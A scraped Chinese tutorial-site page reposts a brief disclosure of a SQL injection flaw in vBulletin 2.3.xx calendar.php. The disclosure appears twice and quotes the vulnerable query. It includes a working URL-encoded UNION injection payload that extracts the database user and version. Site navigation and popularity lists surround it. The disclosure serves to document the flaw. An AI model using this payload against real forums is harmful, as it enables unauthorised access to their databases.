vBulletin Forum 2.3.xx SQL Injection

[摘要]vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php.-------- Cu...

vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

关键词：vBulletin Forum 2.3.xx SQL Injection

盾怪网教程：是一个免费提供流行杀毒软件教程、在线学习分享的学习平台！盾怪网教程 360手机杀毒安卓手机内存名单放弃极速版网站首页 2345卫士 360杀毒 360安全卫士电脑管家金山毒霸游戏下载软件教程游戏教程电脑系统下载您当前所在位置：下载首页 -> 编程语言
vBulletin Forum 2.3.xx SQL Injection 时间：2025/3/5作者：未知来源：盾怪网教程人气： [摘要]vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php.-------- Cu... vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php. -------- Cut from line 585 in calendar.php ---------- else if ($action == "edit") { $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid, eventdate,event,subject FROM calendar_events WHERE eventid = $eventid"); ----------------------------------------------------- If the MySQL version is greater than 4.00, a UNION attack could be used. ----------------------------------------- http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate ----------------------------------------- The query_first function will only return the first row of the query result, so make sure it returns ! the one you want. 关键词：vBulletin Forum 2.3.xx SQL Injection	*软件教程* 聊天工具办公软件杀毒教程系统工具图形图像电脑学习应用软件网络软件苹果应用多媒体区网站教程编程语言安卓教程其它教程 *人气排行* 1VB.NET开发扫描客户端服务工具 2dvbbs绝对背后的微笑 3C++学习感想 4Visual C++ MFC 中常用宏的含义 5asp+ VB上传文件代码 6C++中的const限定修饰符 7个用vc开发的域名查询组件（源代码及说明） 8使用自己开发的vc组件结合asp完成网上实时搜索 9百万程序员的苦恼－选择VB.NET还是C# 10用Delphi7设计FTP上传软件 *推荐资讯* 1C++处理for循环作用域规则 2高质量C++/C编程向导(一) 3使用Web服务将C#代码转换为VB.NET代码 4dvbbs绝对背后的微笑 5用VB生成DLL封装ASP代码，连接数据库 6C++中的const限定修饰符 7百万程序员的苦恼－选择VB.NET还是C# 8分辨C与C++的规范原型 9用VC++6.0完成PC机与单片机之间串行通信的方法 10个用vc开发的域名查询组件（源代码及说明）
Copyright © 2012-2018 盾怪网教程(http://www.dunguai.com) .All Rights Reserved 网站地图友情链接免责声明：本站资源均来自互联网收集如有侵犯到您利益的地方请及时联系管理删除，敬请见谅! QQ:1006262270 邮箱:kfyvi376850063@126.com 手机版